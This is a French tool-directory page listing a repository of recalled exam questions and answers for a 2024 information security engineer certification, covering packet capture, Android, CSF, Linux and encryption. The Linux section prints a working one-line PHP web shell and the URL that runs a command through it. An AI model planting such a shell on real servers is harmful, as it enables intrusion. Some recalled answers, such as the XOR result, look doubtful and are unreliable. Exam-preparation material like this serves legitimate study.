Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/jas502n/2024informationsecurityengineer
Android SecurityEncryption/Decryption ToolsNetwork SecurityLearning & EducationCurated ResourcesLearning Paths & CoursesLabs & Practice
GitHubjas502n/2024informationsecurityengineer

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

2024InformationSecurityEngineer

2024年信息安全工程师、2024InformationSecurityEngineer

Voir le dépôt
1il y a 1 anPas encore vérifié

2024InformationSecurityEngineer

Ingénieur en sécurité de l'information 2024, 2024InformationSecurityEngineer

Ingénieur en sécurité de l'information – second semestre 2024

Récapitulatif des exemples de questions

Date de l'examen : 2024年11月08日

I. Capture de paquets du pare-feu (14 points)

  1. Longueur du paquet ___ (2 points) Réponse : 63
  2. S'agit-il d'une machine physique ou d'une machine virtuelle ___ (2 points) Réponse : machine virtuelle
  3. IP et port de l'hôte de contrôle ___ (2 points) Réponse : 192.168.1.218 14444
  4. Règle de filtrage Wireshark pour l'IP et le port ___ (2 points) Réponse : ip.addr == 192.168.2.105 and tcp.dstport == 14444
  5. Commande utilisée par l'hôte de contrôle (2 points) Réponse : ipconfig
  6. Raccourci Windows pour afficher le pare-feu ___ (2 points) Réponse : firewall.cpl
  7. Quelle option ___ (2 points) Réponse : Personnalisé

II. Question Android (16 points)

  1. Répertoire/fichier stockant la signature ___ (2 points) Réponse : META-INF

  2. Répertoire/fichier stockant les permissions ___ (2 points) Réponse : AndroidManifest.xml

  3. Question 5 (10 points) (1) Quel paramètre prend en charge la sauvegarde ? (2) Peut-on lire les informations de localisation historiques ? Y a-t-il un risque pour la sécurité ? (3) Dans le fichier de configuration, lesquels des quatre composants principaux sont utilisés ? (4) Quel composant présente le risque de fuite d'informations le plus élevé ? (5) Y a-t-il un abus d'informations ? Expliquer en détail.

    Réponse : (1) backup...... La sauvegarde n'est pas prise en charge. (2) Il existe un risque : les informations inconnues risquent d'être divulguées. (3) Activity、BroadcastRecevier (4) Contentprovider (5) Il existe un abus d'informations : permissions de localisation, caméra, stockage, contacts, multimédia, Bluetooth, etc. Beaucoup sont des collectes excessives.

  4. L'utilisateur Android dispose-t-il des droits root ? (2 points) Réponse : Non

III. CSF (11 points)

  1. Quel modèle de sécurité ___ (2 points) Réponse : PDRR
  2. Inconnu
  3. Le pare-feu correspond à quelle fonctionnalité principale ___ (2 points) Réponse : Protection
  4. Question 2 (4 points) (1) Quelle fonctionnalité principale CSF possède-t-elle en plus par rapport à PDRR ? ___ (2 points) Réponse : Identification (2) L'évaluation des risques relève de quelle fonction du CSF ? ___ (2 points) Réponse : Identification
  5. Outre l'identification des actifs, quelles sont les trois autres identifications ? ___ (3 points) Réponse : identification des risques ; identification des vulnérabilités ; identification des mesures de sécurité existantes

IV. Linux (13 points)

  1. Nom complet de ll ___ (2 points) Réponse : ls -l
  2. Actuellement, est-on root ou utilisateur ordinaire ___ (2 points) Réponse : root
  3. Représentation numérique des permissions de fichiers ___ (2 points) Réponse : rw-r--r-- 644
  4. Que signifie ../ dans la figure ___ (2 points) Réponse : répertoire parent, /var/www/html
  5. Commandes Linux intégrées pour calculer les valeurs de hachage ___ (2 points) md5sum; sha1sum; shasum -a 256
  6. shell.php <?php @eval($_GET["cmd"]); ?> (5 points)
  1. Quel est le mot de passe de connexion correspondant à ce fichier ? Réponse : cmd
  2. Quelle méthode de requête HTTP ? Réponse : GET
  3. En supposant que le nom de domaine est abc.com, URL de requête complète pour exécuter whoami Réponse : abc.com/shell.php?cmd=system("whoami")

V. Chiffrement (15 points)

  1. Outre le chiffrement symétrique et asymétrique, comment peut-on encore chiffrer selon le mode de traitement du texte clair ? (2 points) Réponse : chiffrement par blocs et chiffrement par flux
  2. Les 8 bits de a (2 points) Réponse : 97 ---》 01100001
  3. Résultat du chiffrement par XOR de a avec abc (6 points) Réponse : 032 ou 00000000 00000011 00000010
  4. Étant donné mi, ki, ci, comment obtenir la formule du texte clair ? (2 points) Réponse : mi = ki XOR ^ ci
  5. Deux textes clairs différents chiffrés avec la même clé de chiffrement de flux sont-ils sûrs ? Pourquoi ? (2 points) Réponse : Non, on peut déduire l'autre texte clair à partir d'un texte clair.
  6. Un chiffrement par blocs peut-il être utilisé comme chiffrement de flux ? (1 point) Réponse : Oui
Télécharger l’outil